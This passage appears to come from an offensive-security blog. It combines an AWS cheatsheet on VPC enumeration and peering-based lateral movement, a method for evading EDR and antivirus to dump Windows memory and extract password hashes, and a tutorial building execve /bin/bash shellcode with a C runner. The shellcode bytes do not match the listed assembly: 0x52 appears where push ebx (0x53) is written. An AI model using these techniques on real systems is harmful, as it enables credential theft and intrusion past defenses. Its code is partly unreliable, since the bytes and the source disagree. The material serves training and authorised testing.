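    return [(e["eventTime"], e["eventName"], r) for e in events for r in classify_event(e)]


if __name__ == "__main__":
    for when, name, reason in scan(SAMPLE_EVENTS):
        print(when, name, reason)
```

<p>The user-agent check is deliberately a baseline comparison rather than a blocklist, since a spoofed agent is built to look like a legitimate CLI; what gives it away is that this principal never used that version before.</p>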
<h2 id="aws-shield">AWS Shield</h2>
<ul>
<li>Used to protect services from Denial of Service Attacks</li>
<li>There are 2 versions, the standard and the Advanced</li>
</ul>
<h2 id="aws-waf">AWS WAF</h2>
<ul>
<li>Used to protect applications against common web application attacks</li>
<li>Common WAF bypasses can be tested against it</li>
<li>To detect a WAF, we can use <code class="language-plaintext highlighter-rouge">wafw00f</code></li>
</ul>
<h2 id="aws-inspector">AWS Inspector</h2>
<ul>
<li>Automated security assessment service that helps improve the security and compliance of applications on AWS</li>
<li>Works with an agent</li>
</ul>
<h2 id="aws-guard-duty">AWS Guard Duty</h2>
<ul>
<li>Threat detection service that monitors for malicious activity and unauthorized behavior</li>
<li>Works by collecting and analyzing logs</li>
</ul>
<h1 id="virtual-private-cloud">Virtual Private Cloud</h1>
<ul>
<li>Used to create an isolated network within the cloud, including subnets and so on.</li>
<li>If a subnet routes to an internet gateway, it is a public subnet</li>
<li>Every VPC can have Network ACLs</li>
</ul>
<h2 id="routing-tables">Routing Tables</h2>
<p>A set of rules that determines where traffic is directed. Each rule comes in the form of a Destination and a Target, defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DESTINATION TARGET
IP local -> VPC Internal
IP igw -> Internet Gateway
IP nat -> NAT Gateway
IP pcx -> VPC Peering
IP vpce -> VPC Endpoint
IP vgw -> VPN Gateway
IP eni -> Network Interface
</code></pre></div></div>
<ul>
<li>VPC Internal -> Internal IP ranges, no internet connection</li>
<li>Internet Gateway -> Used to access the internet</li>
<li>NAT Gateway -> Does NAT for the machines behind it, allowing outbound-only connections to the internet</li>
<li>VPC Peering -> Allows communication between 2 VPCs</li>
<li>VPC Endpoint -> Used to access AWS services without an internet connection (Internet Gateway)</li>
<li>VPN Gateway -> Used to extend the cloud to on-premises networks and vice versa</li>
<li>Network Interface -> Sends the traffic to a specific elastic network interface (for example an appliance instance)</li>
</ul>
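<p>The target prefixes in the table above are exactly what <code class="language-plaintext highlighter-rouge">aws ec2 describe-route-tables</code> returns, so the legend can be applied mechanically: classify every route, flag the subnets whose default route goes straight to an <code class="language-plaintext highlighter-rouge">igw-</code> (public subnets), and list the routes that cross a peering connection (where the lateral movement scenario below becomes possible). This is an added example, not part of the original cheatsheet; the sample response is constructed in the shape of the CLI output, and the VPC, subnet, table and gateway IDs are made up. The list of keys under which a route’s target appears is an assumption based on the describe-route-tables response fields.</p>

```python
# Legend from the routing-table section: target-id prefix -> kind of target.
TARGET_KINDS = [
    ("local", "VPC Internal"), ("igw-", "Internet Gateway"), ("nat-", "NAT Gateway"),
    ("pcx-", "VPC Peering"), ("vpce-", "VPC Endpoint"), ("vgw-", "VPN Gateway"),
    ("eni-", "Network Interface"),
]

# Keys under which a route's target shows up in describe-route-tables output (assumed set).
TARGET_KEYS = ("GatewayId", "NatGatewayId", "VpcPeeringConnectionId",
               "NetworkInterfaceId", "TransitGatewayId", "InstanceId")

# Constructed sample in the shape of `aws ec2 describe-route-tables`; IDs are made up.
SAMPLE_ROUTE_TABLES = {"RouteTables": [
    {"RouteTableId": "rtb-0pub", "VpcId": "vpc-0a",
     "Associations": [{"SubnetId": "subnet-0pub1"}, {"SubnetId": "subnet-0pub2"}],
     "Routes": [
         {"DestinationCidrBlock": "10.0.0.0/16", "GatewayId": "local", "State": "active"},
         {"DestinationCidrBlock": "0.0.0.0/0", "GatewayId": "igw-0123", "State": "active"}]},
    {"RouteTableId": "rtb-0priv", "VpcId": "vpc-0a",
     "Associations": [{"SubnetId": "subnet-0priv1"}],
     "Routes": [
         {"DestinationCidrBlock": "10.0.0.0/16", "GatewayId": "local", "State": "active"},
         {"DestinationCidrBlock": "0.0.0.0/0", "NatGatewayId": "nat-0456", "State": "active"},
         {"DestinationCidrBlock": "10.1.0.0/16", "VpcPeeringConnectionId": "pcx-0789",
          "State": "active"}]},
]}


def route_target(route):
    """The ID the route points at, whichever key it was reported under."""
    for key in TARGET_KEYS:
        if key in route:
            return route[key]
    return "?"


def target_kind(target):
    """Apply the legend to a target ID."""
    for prefix, kind in TARGET_KINDS:
        if target.startswith(prefix):
            return kind
    return "Unknown"


def describe_routes(route_table):
    """(destination, target, kind) for every route in one table."""
    return [(r.get("DestinationCidrBlock", r.get("DestinationIpv6CidrBlock", "?")),
             route_target(r), target_kind(route_target(r)))
            for r in route_table["Routes"]]


def public_subnets(response):
    """Subnets whose table sends default traffic straight to an internet gateway."""
    public = set()
    for rt in response["RouteTables"]:
        igw_default = any(r.get("DestinationCidrBlock") == "0.0.0.0/0"
                          and route_target(r).startswith("igw-")
                          and r.get("State", "active") == "active"
                          for r in rt["Routes"])
        if igw_default:
            public.update(a["SubnetId"] for a in rt.get("Associations", []) if "SubnetId" in a)
    return sorted(public)


def peered_destinations(response):
    """(table, destination CIDR, peering id): where traffic can reach another VPC."""
    return [(rt["RouteTableId"], dest, target)
            for rt in response["RouteTables"]
            for dest, target, kind in describe_routes(rt) if kind == "VPC Peering"]


if __name__ == "__main__":
    for rt in SAMPLE_ROUTE_TABLES["RouteTables"]:
        print(rt["RouteTableId"], describe_routes(rt))
    print("public:", public_subnets(SAMPLE_ROUTE_TABLES))
    print("peered:", peered_destinations(SAMPLE_ROUTE_TABLES))
```

<p>Running it on saved output (<code class="language-plaintext highlighter-rouge">json.load</code> the CLI result and pass it in place of the sample) gives the same three views the enumeration commands below are used for, without reading every table by hand.</p>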
<h2 id="enumeration-7">Enumeration</h2>
<h3 id="listing-vpcs">Listing VPCs</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-vpcs
</code></pre></div></div>
<h3 id="listing-vpcs-specifing-the-region">Listing VPCs specifying the region</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-vpcs --region us-west-1
</code></pre></div></div>
<h3 id="listing-vpc-information-by-id">Listing VPC information by ID</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-vpcs --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h3 id="listing-subnets">Listing subnets</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-subnets
</code></pre></div></div>
<h3 id="listing-subnets-by-vpc-id">Listing subnets by VPC-id</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h3 id="listing-routing-tables">Listing routing tables</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-route-tables
</code></pre></div></div>
<h3 id="listing-routing-tables-by-vpc-id">Listing routing tables by VPC-id</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h3 id="listing-network-acls">Listing Network ACL’s</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-network-acls
</code></pre></div></div>
<h2 id="lateral-movement-and-pivoting">Lateral Movement and Pivoting</h2>
<ul>
<li>We can abuse VPC peering to do lateral movement</li>
</ul>
<h3 id="scenario">Scenario</h3>
<ul>
<li>There are 3 VPCs -> A, B, C</li>
<li>A can access B through peering and B can access C. We can use VPC B as a peering pivot to access VPC C from VPC A.</li>
<li>The lateral movement can be done if we gather keys or access to other machines</li>
<li>Always enumerate the subnets to see from which subnet we can access other VPCs</li>
</ul>
<h4 id="listing-vpc-peering-connections">Listing VPC peering connections</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-vpc-peering-connections
</code></pre></div></div>
<h4 id="listing-subnets-of-specific-vpc-important-because-the-access-can-be-restricted-to-specific-subnets-to-other-vpcs">Listing subnets of specific VPC (Important because the access can be restricted to specific subnets to other VPC’s)</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h4 id="listing-routing-tables-1">Listing routing tables</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h4 id="listing-instances-on-the-specified-vpc-id">Listing instances on the specified VPC ID</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instances --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h4 id="listing-instances-on-the-specified-subnet">Listing instances on the specified subnet</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instances --filters "Name=subnet-id,Values=ID"
</code></pre></div></div>
<h1 id="bypass-lsass-dump-protection-with-ram-dump">Bypass LSASS Dump protection with RAM Dump</h1>
<p>Published 2022-09-21, <a href="https://www.untrustaland.com/blog/lsass-dump-bypass">https://www.untrustaland.com/blog/lsass-dump-bypass</a></p>
<p>There is nothing more frustrating than an Antivirus blocking the execution of our tools and/or preventing certain actions from occurring, like spawning a shell or blocking our attempts to dump the lsass process.</p>
<p>Modern protections such as EDR will surely block these types of attacks by hooking some API’s and/or monitoring software behavior based on user actions. There are some bypasses that an operator can try (E.g Hell’s Gate) but instead of coding a complex piece of software, it’s possible to try a simpler approach.</p>
<p>Here I show a tool that I have been using when the LSASS dump fails or gets blocked: Magnet RAM Capture (there is no need to install it). <a href="https://www.magnetforensics.com/downloads/MagnetRAMCapture.exe">LINK</a></p>
<p>Magnet RAM Capture is a forensic tool to dump volatile memory. It will dump ALL the memory to a file, afterwards it’s possible to grab the contents of this dump such as registry hives, passwords, processes, windows info and so on.</p>
<p>The tool outputs a raw file. To analyse it, I have been using volatility3; version 2 also works, but there are some Windows builds I could not get it to work on, so I stick with version 3.</p>
<p><img src="/assets/images/magnetic_ram_capture.PNG" alt="MAGNETIC" /></p>
<p>To use it, just run it and click START. The tool is not considered malicious because it is a trusted tool used in legitimate forensic work.</p>
<p><img src="/assets/images/magnetic_antiscan.png" alt="ANTISCAN" /></p>
<p>In this demonstration, I am using a fully updated Windows 10 with Kaspersky Endpoint Protection fully active and an industry EDR with all modules activated.</p>
<p>Inspecting windows info</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 vol.py -f /home/kali/Documents/memory_analysis.raw windows.info
</code></pre></div></div>
<p><img src="/assets/images/windows_info.PNG" alt="windows_info" /></p>
<p>Grabbing the hashes with volatility</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 vol.py <span class="nt">-f</span> /home/kali/Documents/memory_analysis.raw windows.hashdump
</code></pre></div></div>
<p><img src="/assets/images/hashdump.PNG" alt="hashdump" /></p>
<p>Volatility offers a lot of options to analyse the dump:</p>
<ul>
<li>Grab processes</li>
<li>Network Connections</li>
<li>Cache Dump (Domain Credentials)</li>
<li>Dump Processes</li>
</ul>
<p>I recommend that you read the documentation and choose the options that fit your needs during the engagement.</p>
<p>The only drawback of this tool is the size of the raw file: it matches the size of the RAM, so a computer with 32 GB of RAM produces a 32 GB dump, which can be hard to download or move somewhere for analysis; it all depends on the case and situation.</p>
<h1 id="shellcode-creation-and-binary-execution-through-execve">Shellcode creation and binary execution through execve</h1>
<p>Published 2022-07-04, <a href="https://www.untrustaland.com/blog/execve-shellcode">https://www.untrustaland.com/blog/execve-shellcode</a></p>
<p>In this guide I will show you how to create shellcode and execute binaries using the execve function.</p>
<h2 id="motivation">Motivation</h2>
<p>Well, assembly language is amazing, so why don’t we learn some fancy ways to generate shellcode and execute programs?</p>
<p>When developing exploits, sometimes we will have to generate our own shellcode, and this technique is the way to go.</p>
<p>Another case is a shellcode runner: we can put our assembly inline with the programming language and execute it to get a reverse shell and so on.</p>
<h2 id="pre-concepts-before-we-continue">Pre-concepts before we continue</h2>
<p>I know what you are thinking: “Assembly is hard”, “Do we really have to do it in assembly?” and the answer is YES! The learning curve of this language is challenging, but it’s always possible to learn more about it.</p>
<p>Here I leave some courses for you:</p>
<ul>
<li><a href="https://www.xorpd.net/pages/x86_adventures.html">Assembly Language Adventures</a></li>
<li>SLAE32 - Pentester Academy</li>
</ul>
<h2 id="why-32-bits-first">Why 32 bits first?</h2>
<p>Because it’s <strong>easier</strong> and there are applications out there that still use 32 bits.</p>
<p>Some concepts change in x64, so it’s better to learn the logic and concepts in 32 bits; 64 bits will then be easier to assimilate.</p>
<h2 id="assembly-x86-lightning-course">Assembly x86 lightning course</h2>
<p>Lets pick some basic concepts before we continue.</p>
<h3 id="registers">Registers</h3>
<p>The processor’s fast internal memory, used to store and move data. There are several types of registers and each type has its own purpose (nowadays all of them can be used as general-purpose registers).</p>
<p>You can also think that registers are like variables.</p>
<p>Lets pick some examples.</p>
<ul>
<li>EAX -> 32 bit register, can store a DWORD and be further divided in AX, AH and AL. (Commonly used as an accumulator for mathematic operations, store return addresses and syscalls)</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>EAX (32 Bits) -> 0x12345678
AX (16 Bits) -> 5678
AH (8 Bits, "higher") -> 56
AL (8 Bits, "lower") -> 78
</code></pre></div></div>
<ul>
<li>EIP -> Stores the address of the next instruction to be executed (gain control of EIP and you control the execution flow of the program, you can imagine why).</li>
<li>ESP -> Pointer to the top of the stack.</li>
<li>EFLAGS -> Holds status flags such as ZF and OF (used, for example, in conditional branching).</li>
<li><a href="https://www.tutorialspoint.com/assembly_programming/assembly_registers.htm">More info on registers</a></li>
</ul>
<h3 id="zeroing-registers-and-removing-null-bytes">Zeroing Registers (And removing null bytes)</h3>
<p>There are a lot of situations in which we need to zero a register or remove specific characters from a shellcode; one example is removing null bytes so the shellcode can be used later in exploits.</p>
<p>Some techniques:</p>
<p><strong>1. Using the lowest part of the register</strong></p>
<p>This is very interesting: we can zero the register with a XOR operation and then put some content in AL.</p>
<p>Example</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xor eax,eax ; Make the register contain 0
mov al, 5 ; Move 0x05 to AL
</code></pre></div></div>
<p>EAX now contains 5.</p>
<p><strong>2. Negative numbers</strong></p>
<p>Another cool trick: it’s possible to load our selected value in situations where we can’t use the number directly.</p>
<p>Imagine the situation where we are writing an exploit and can’t use the number 0x00000001 because it contains null bytes (the zeros in the value).</p>
<p>To solve this problem, it’s possible to use the NEG instruction in assembly, which computes the two’s complement of the register and stores the result back in it (<em>What?</em>)</p>
<p>Let’s illustrate this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov eax, 0xffffffff
neg EAX
</code></pre></div></div>
<p>EAX will contain 0x01, and the instruction bytes contain no nulls.</p>
<p>What happens here is that when we use the NEG instruction, it flips the bits and adds 1 to the result (also known as two’s complement)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Binary view of the NEG instruction (8-bit example)
11111111
After flip
00000000
Add 1
00000001
</code></pre></div></div>
<p>This way we can put the number inside EAX without actually putting it.</p>
<p>You can use your imagination, there are a lot of things to create. Another example: instead of a NOP (0x90) we can use XCHG EAX,EAX, which effectively does nothing (note that NASM encodes <code class="language-plaintext highlighter-rouge">xchg eax,eax</code> as that same 0x90 byte; a pair like <code class="language-plaintext highlighter-rouge">xchg eax,ebx</code> executed twice gives a different encoding with the same net effect).</p>
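<p>Both tricks above are really questions about the bytes an immediate produces, so they can be checked before assembling anything. The script below is an added example, not part of the original post: <code class="language-plaintext highlighter-rouge">neg32</code> reproduces what <code class="language-plaintext highlighter-rouge">neg eax</code> does, <code class="language-plaintext highlighter-rouge">has_null</code> tests whether an immediate would put a 0x00 into the shellcode, and <code class="language-plaintext highlighter-rouge">plan_load</code> picks between a plain <code class="language-plaintext highlighter-rouge">mov</code>, technique 1 (<code class="language-plaintext highlighter-rouge">xor</code> + <code class="language-plaintext highlighter-rouge">mov al</code>) and technique 2 (<code class="language-plaintext highlighter-rouge">mov</code> + <code class="language-plaintext highlighter-rouge">neg</code>), returning <code class="language-plaintext highlighter-rouge">None</code> when neither helps. It goes beyond the post’s single example by showing a value where only NEG works and one where neither trick works. The function and register names are the example’s own choices.</p>

```python
MASK32 = 0xFFFFFFFF


def neg32(value):
    """What `neg eax` does: two's complement (flip every bit, add 1), kept to 32 bits."""
    return ((value ^ MASK32) + 1) & MASK32


def has_null(value, width=4):
    """True if the immediate, encoded little-endian in `width` bytes, contains 0x00."""
    return b"\x00" in value.to_bytes(width, "little")


def plan_load(target):
    """Instructions that leave `target` in EAX without a null byte in the encoding,
    or None when neither trick from the section above applies."""
    if target == 0:
        return ["xor eax, eax"]
    if not has_null(target):
        return [f"mov eax, 0x{target:08x}"]          # the plain 5-byte mov is already clean
    if target <= 0xFF:                               # technique 1: zero, then load the low byte
        return ["xor eax, eax", f"mov al, 0x{target:02x}"]
    source = neg32(target)                           # technique 2: load -target, then neg
    if not has_null(source):
        return [f"mov eax, 0x{source:08x}", "neg eax"]
    return None                                      # e.g. 0x100: -0x100 = 0xffffff00 still has a null


def run(plan):
    """Tiny interpreter for the instructions plan_load emits; returns the final EAX."""
    eax = 0xDEADBEEF  # arbitrary garbage the register may hold before our code runs
    for ins in plan:
        op, _, args = ins.partition(" ")
        if op == "xor":
            eax = 0
        elif op == "neg":
            eax = neg32(eax)
        elif op == "mov":
            reg, imm = [a.strip() for a in args.split(",")]
            if reg == "eax":
                eax = int(imm, 16)
            else:  # al: only the low byte changes
                eax = (eax & 0xFFFFFF00) | int(imm, 16)
    return eax


if __name__ == "__main__":
    for t in (1, 5, 0x101, 0x100, 0xFFFFFFFF):
        plan = plan_load(t)
        print(f"0x{t:08x}: {plan} -> 0x{run(plan):08x}" if plan else f"0x{t:08x}: no null-free plan")
```

<p>The case <code class="language-plaintext highlighter-rouge">0x100</code> is the caveat worth remembering: NEG only removes nulls that the complement happens to fill, and a value whose lowest byte is zero negates to another value whose lowest byte is zero.</p>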
<h3 id="segments">Segments</h3>
<p>Another important concept is sections (segments), which are the areas where our code and data are placed when the program is loaded.</p>
<p>Some examples:</p>
<ul>
<li>.text segment -> Where the executable code is stored</li>
<li>.bss -> Uninitialized variables</li>
<li>.data -> Initialized variables</li>
</ul>
<p>Here is an example of a program that prints our lovely “Hello World” message</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>global _start
; Define an area for our code, in this case the text section
section .text
; Define program entry point
_start:
; Print the message on the screen
mov eax, 0x04 ; Syscall number (write = 4)
mov ebx, 0x01 ; Argument 1 (stdout)
mov ecx, message ; Argument 2 (pointer to the message)
mov edx, mlen ; Argument 3 (message length)
int 0x80 ; Invoke the interrupt (syscall)
; Exit the program
mov eax, 0x01 ; exit syscall number
mov ebx, 0x01 ; Arbitrary return value
int 0x80 ;
; Define an area for initialized data (.data section)
section .data
message: db "Hello World!" ; Here we define a label with our string
mlen equ $-message ; Using the equ directive to compute the length of our message
</code></pre></div></div>
<p>It’s easier to see how the sections are used with this piece of code.</p>
<h3 id="stack">Stack</h3>
<p>The stack is a data structure where we can store values for further processing. It’s a LIFO structure (last in, first out) where values are PUSHed onto the stack and removed with the POP instruction.</p>
<p>Think of it like a pile of plates: you put one plate on top of the other, and when you need to remove one, you take the one on top (last in, first out).</p>
<h3 id="endianess">Endianess</h3>
<p>Sometimes your brain will get so confused you want to stop and take a break; the reason, in many cases, is endianness.</p>
<p>This is the order in which the bytes of a value are stored in memory. For our purposes we will look at little endian.</p>
<p><code class="language-plaintext highlighter-rouge">A little-endian system stores the least-significant byte at the smallest address.</code></p>
<p><em>What does it mean?</em></p>
<p>Lets look at an example.</p>
<p>Take a value like <em>0x12345678</em>. Its least significant byte is the rightmost one (0x78), so when the value is stored in memory (for example pushed onto the stack) the bytes appear as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Lower addresses
78
56
34
12
Higher addresses
</code></pre></div></div>
<p>The least significant byte goes to the lowest address. This is important when we develop exploits, as we need to write an address in this byte order for it to be interpreted correctly in memory.</p>
<p>There is also <em>Big Endian</em>, but I will leave you as an exercise to search about it.</p>
<h3 id="syscalls">Syscalls</h3>
<p>In Linux, syscalls are the way to ask the kernel to do specific actions, like writing something on the screen, exiting programs, creating files and so on. (In Windows, the equivalent are APIs.)</p>
<p>To execute a syscall in Linux, you put its number in EAX and the arguments in EBX, ECX, and so on. After this you issue <em>int 0x80</em>, which looks up the syscall table and executes the action.</p>
<p>Example</p>
<p>The exit syscall is used to terminate the program and set a status code. It has the following definition:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">exit</span><span class="p">(</span><span class="kt">int</span> <span class="n">status</span><span class="p">);</span>
</code></pre></div></div>
<p>It receives one argument, the status. Converting this to assembly:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>; Exit the program
mov eax, 0x01 ; Exit syscall number
mov ebx, 0x01 ; Arbitrary return value
int 0x80 ;
</code></pre></div></div>
<p>Passing the syscall number (1) in eax, the status in EBX and then issuing the <em>int 0x80</em> to invoke the syscall.</p>
<h3 id="execve">EXECVE</h3>
<p>From the man pages (<code class="language-plaintext highlighter-rouge">man execve</code>):</p>
<p><em>execve() executes the program referred to by pathname</em></p>
<p>Definition</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">execve</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">pathname</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="k">const</span> <span class="n">argv</span><span class="p">[],</span><span class="kt">char</span> <span class="o">*</span><span class="k">const</span> <span class="n">envp</span><span class="p">[]);</span>
</code></pre></div></div>
<p>Interesting info</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>argv is an array of pointers to strings passed to the new program as its command-line arguments. By convention, the first of these strings (i.e., argv[0]) should contain the filename associated with the file being executed. The argv array must be terminated by a NULL pointer.
(Thus, in the new program, argv[argc] will be NULL.)
envp is an array of pointers to strings, conventionally of the form key=value, which are passed as the environment of the new program. The envp array must be terminated by a NULL pointer.
</code></pre></div></div>
<p>We will use this function to execute our program with the following values.</p>
<ul>
<li>The pathname is the path for the program we want to execute (Example <code class="language-plaintext highlighter-rouge">/bin/bash, 0x00</code>)</li>
<li>The second argument will be the address of <code class="language-plaintext highlighter-rouge">/bin/bash</code> followed by a NULL pointer (as this value is an array of pointers)</li>
<li>The third argument will contain null as well.</li>
</ul>
<p>One interesting fact is that our payload <em>cannot contain null bytes</em>. So how do we get around that?</p>
<h2 id="building-our-assembly">Building our assembly</h2>
<p>To solve the problem we faced earlier, we will use the first technique to zero out the register.</p>
<h3 id="binbash-trickery">/bin/bash trickery</h3>
<p>The stack is 4-byte aligned on x86 processors, so we push the string in 4-byte chunks, each reversed (little-endian).</p>
<p>Since the stack grows towards lower addresses, the last chunk of the string is pushed first. One thing we can do is pad the path to a multiple of 4 and push in the following order:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash (4 bytes)  ; pushed first, ends up at the highest address
bin/ (4 bytes)
//// (4 bytes)  ; pushed last, ESP then points at "////bin/bash"
</code></pre></div></div>
<p>No matter how many <code class="language-plaintext highlighter-rouge">/</code> we put in front of the path, consecutive slashes are resolved as one, so <code class="language-plaintext highlighter-rouge">////bin/bash</code> is <code class="language-plaintext highlighter-rouge">/bin/bash</code>.</p>
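<p>The chunk order and the reversed (little-endian) values are easy to get wrong by hand, so here is the computation done in code. This is an added example, not part of the original post, and it also serves the endianness section above: <code class="language-plaintext highlighter-rouge">struct.pack("&lt;I", ...)</code> is exactly the little-endian byte order discussed there. It pads any path with leading slashes to a multiple of 4, returns the immediates in push order, and rebuilds the memory image so the result can be checked against the original string; the function names are the example’s own.</p>

```python
import struct


def path_to_pushes(path):
    """32-bit immediates to push, in push order, so that after the pushes ESP points
    at `path` padded with leading slashes to a multiple of 4 bytes."""
    data = path.encode()
    padded = b"/" * ((-len(data)) % 4) + data
    chunks = [padded[i:i + 4] for i in range(0, len(padded), 4)]
    # The last chunk is pushed first: the stack grows downwards, so it lands highest in memory.
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]


def stack_bytes(pushes):
    """Memory from ESP upwards after the pushes (each dword little-endian, last push lowest)."""
    return b"".join(struct.pack("<I", value) for value in reversed(pushes))


def has_null(pushes):
    """True if any push immediate would put a 0x00 byte into the shellcode."""
    return any(b"\x00" in struct.pack("<I", value) for value in pushes)


def nasm_lines(path):
    """NASM source for the pushes, with the chunk each immediate encodes as a comment."""
    return [f"push 0x{value:08x} ; {struct.pack('<I', value).decode()!r}"
            for value in path_to_pushes(path)]


if __name__ == "__main__":
    for p in ("/bin/bash", "/bin/sh"):
        print("\n".join(nasm_lines(p)))
        print("; ESP ->", stack_bytes(path_to_pushes(p)), "null-free:", not has_null(path_to_pushes(p)))
```

<p>For <code class="language-plaintext highlighter-rouge">/bin/bash</code> the three immediates come out as 0x68736162, 0x2f6e6962 and 0x2f2f2f2f, the values used in the final assembly below; <code class="language-plaintext highlighter-rouge">/bin/sh</code> needs only one padding slash and two pushes.</p>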
<h3 id="final-assembly-code">Final Assembly code</h3>
<p>This is our final code</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>; Execute programs through execve in Assembly
; Author: pop3ret
; The _start label defines the entry point of our program
global _start
; .text section, where our code resides
section .text
_start:
xor eax,eax ; Zero out the register
push eax ; put 0x0 onto the stack (terminator of the string)
; Put ////bin/bash onto the stack, remember that this value needs to be
; a multiple of 4 bytes to align the stack. (First argument)
push 0x68736162 ; "bash" (reversed)
push 0x2f6e6962 ; "bin/" (reversed)
push 0x2f2f2f2f ; "////"
; Put the other arguments onto the stack
mov ebx, esp ; EBX now points to the string ////bin/bash,0x0 (First argument). Each push does esp = esp - 4
push eax ; PUSH 0 (NULL: terminator of argv, and envp itself)
mov edx,esp ; EDX now points to NULL (Third argument, envp)
push ebx ; EBX contains a pointer to ////bin/bash (argv[0])
mov ecx,esp ; ECX points to the array {pointer to ////bin/bash, NULL} (Second argument, argv)
; Calling execve (Syscall 11); EAX is still 0, so loading AL is enough
mov al,11
int 0x80
</code></pre></div></div>
<p>Let’s compile this ASM with this simple bash script</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/bash
#############################################
# Simple compiler and linker for nasm (x86) #
# Author: pop3ret                           #
# Usage: ./compiler.sh asm_name             #
#############################################
## @ Main
# Assembling into a 32-bit ELF object
nasm -f elf32 "$1.asm" -o "$1.o"
# Linking as a 32-bit executable
ld -m elf_i386 "$1.o" -o "$1"
</code></pre></div></div>
<p>And execute</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./execve
</code></pre></div></div>
<p>After the execution we get our <code class="language-plaintext highlighter-rouge">/bin/bash</code>.</p>
<h2 id="shellcode">Shellcode</h2>
<p>Shellcode is basically the raw machine-code bytes (opcodes) that our assembly is translated into.</p>
<p>Example with objdump:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>objdump <span class="nt">-D</span> execve <span class="nt">-M</span> intel
</code></pre></div></div>
<p><img src="/assets/images/objdump.png" alt="OBJDUMP" /></p>
<p>The shellcode will be the second column. (31 c0..)</p>
<p>To grab this information and format, I will use a shell script from commandlinefu (<a href="https://www.commandlinefu.com/commands/view/6051/get-all-shellcode-on-binary-file-from-objdump">Link</a>)</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>objdump <span class="nt">-d</span> ./execve|grep <span class="s1">'[0-9a-f]:'</span>|grep <span class="nt">-v</span> <span class="s1">'file'</span>|cut <span class="nt">-f2</span> <span class="nt">-d</span>:|cut <span class="nt">-f1-6</span> <span class="nt">-d</span><span class="s1">' '</span>|tr <span class="nt">-s</span> <span class="s1">' '</span>|tr <span class="s1">'\t'</span> <span class="s1">' '</span>|sed <span class="s1">'s/ $//g'</span>|sed <span class="s1">'s/ /\\x/g'</span>|paste <span class="nt">-d</span> <span class="s1">''</span> <span class="nt">-s</span> |sed <span class="s1">'s/^/"/'</span>|sed <span class="s1">'s/$/"/g'</span>
</code></pre></div></div>
<p>And put the result inside this C file</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdio.h>
</span>
<span class="kt">char</span> <span class="n">shellcode</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x52\x89\xe1\xb0\x0b\xcd\x80</span><span class="s">"</span><span class="p">;</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">ret</span><span class="p">)()</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">shellcode</span><span class="p">;</span>
<span class="n">ret</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Compiling</p>
